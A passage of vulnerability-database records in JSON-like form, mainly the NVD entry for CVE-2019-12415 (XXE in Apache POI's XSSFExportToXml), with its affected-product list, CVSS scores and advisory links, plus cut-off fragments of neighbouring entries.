"https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: 
"https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: 
"https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Third Party Advisory", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2019-006", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: 
"https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2019-08", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-02", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-1321", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:poi:*:*:*:*:*:*:*:*", matchCriteriaId: "1D82A205-F4BE-4C18-A764-A2364B50BAD9", versionEndIncluding: "4.1.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", matchCriteriaId: "17EA8B91-7634-4636-B647-1049BA7CA088", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5B4DF46F-DBCC-41F2-A260-F83A14838F23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10F17843-32EA-4C31-B65C-F424447BEF7B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_originations:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "7AB8ABFD-C72C-4CBB-8872-9440A19154D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_originations:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "3054FEBB-484B-4927-9D1C-2024772E8B3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_product_manufacturing:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "5AED3C78-7D65-4F02-820D-B51BCE4022F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_product_manufacturing:2.8.0:*:*:*:*:*:*:*", matchCriteriaId: "557A23A1-4762-4D29-A478-D1670C1847D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_payments:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "7BE6EB99-98BF-49A2-8890-829320607A1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_payments:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "FD48BA85-B6D3-4BFD-9B48-755494FF094E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "C2BEE49E-A5AA-42D3-B422-460454505480", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.4.1:*:*:*:*:*:*:*", matchCriteriaId: "F4FF66F7-10C8-4A1C-910A-EF7D12A4284C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "282150FF-C945-4A3E-8A80-E8757A8907EA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.9.0:*:*:*:*:*:*:*", matchCriteriaId: "AB9FC9AB-1070-420F-870E-A5EC43A924A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*", matchCriteriaId: "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B2FDA4C6-68BA-4090-9645-A1A3C526F86C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router_idih\\::8.2.2:*:*:*:*:*:*:*", matchCriteriaId: "00F3F284-E638-495D-89D0-AEB0CCA969CB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", matchCriteriaId: 
"36E39918-B2D6-43F0-A607-8FD8BFF6F340", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "7582B307-3899-4BBB-B868-BC912A4D0109", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_repository:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F9E13DD9-F456-4802-84AD-A2A1F12FE999", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "40F940AA-05BE-426C-89A3-4098E107D9A7", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6762F207-93C7-4363-B2F9-7A7C6F8AF993", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1B74B912-152D-4F38-9FC1-741D6D0B27FC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hyperion_infrastructure_technology:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "DED59B62-C9BF-4C0E-B351-3884E8441655", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", matchCriteriaId: "82EA4BA7-C38B-4AF3-8914-9E3D089EBDD4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*", matchCriteriaId: "B9C9BC66-FA5F-4774-9BDA-7AB88E2839C4", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", matchCriteriaId: "7F69B9A5-F21B-4904-9F27-95C0F7A628E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "9A570E5E-A3BC-4E19-BC44-C28D8BC9A537", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0:*:*:*:*:*:*:*", matchCriteriaId: "991B23C1-83FA-40B1-AF0A-9A7B10A9EDA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.2.0:*:*:*:*:*:*:*", matchCriteriaId: "D56B4193-4DB7-4BD9-85FF-8665601E6D4F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "AEDF91E2-E7B5-40EE-B71F-C7D59F4021BD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: "9A94F93C-5828-4D78-9C48-20AC17E72B8E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "F3E25293-CB03-44CE-A8ED-04B3A0487A6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.1.0:*:*:*:*:*:*:*", matchCriteriaId: "4F9721E3-EE25-4C8A-9E0A-E60D465E0A97", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.2.0:*:*:*:*:*:*:*", matchCriteriaId: "E08D8FE6-2BB4-4FF6-8B42-2D47F6FBFDFA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", matchCriteriaId: 
"C8AF00C6-B97F-414D-A8DF-057E6BFD8597", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:17.12.6:*:*:*:*:*:*:*", matchCriteriaId: "2F5647E5-B051-41A6-B186-3584C725908B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:18.8.8.1:*:*:*:*:*:*:*", matchCriteriaId: "4A405B01-7DC5-41A0-9B61-C2DBE1C71A67", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", matchCriteriaId: "10864586-270E-4ACF-BDCC-ECFCD299305F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0:*:*:*:*:*:*:*", matchCriteriaId: "C8109973-AE49-4E2C-B3A0-DDB18674C1FA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", matchCriteriaId: "EE8CF045-09BB-4069-BCEC-496D5AE3B780", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "24A3C819-5151-4543-A5C6-998C9387C8A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:16.0.3:*:*:*:*:*:*:*", matchCriteriaId: "4FB98961-8C99-4490-A6B8-9A5158784F5A", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "174A6D2E-E42E-4C92-A194-C6A820CD7EF4", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.", }, { lang: "es", value: "En Apache POI versiones hasta 4.1.0, cuando se utiliza la herramienta XSSFExportToXml para convertir documentos de Microsoft Excel proporcionados por el usuario, un documento especialmente diseñado puede permitir a un atacante leer archivos del sistema de archivos local o de los recursos de la red interna por medio de un Procesamiento de Entidad Externa XML (XXE).", }, ], id: "CVE-2019-12415", lastModified: "2024-11-21T04:22:47.553", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { 
attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "NONE", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, exploitabilityScore: 1.8, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-10-23T20:15:12.707", references: [ { source: "security@apache.org", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: 
"security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/13a54b6a03369cfb418a699180ffb83bd727320b6ddfec198b9b728e%40%3Cannounce.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/2ac0327748de0c2b3c1c012481b79936797c711724e0b7da83cf564c%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/895164e03a3c327449069e2fd6ced0367561878b3ae6a8ec740c2007%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/d88b8823867033514d7ec05d66f88c70dc207604d3dcbd44fd88464c%40%3Cuser.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party 
Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
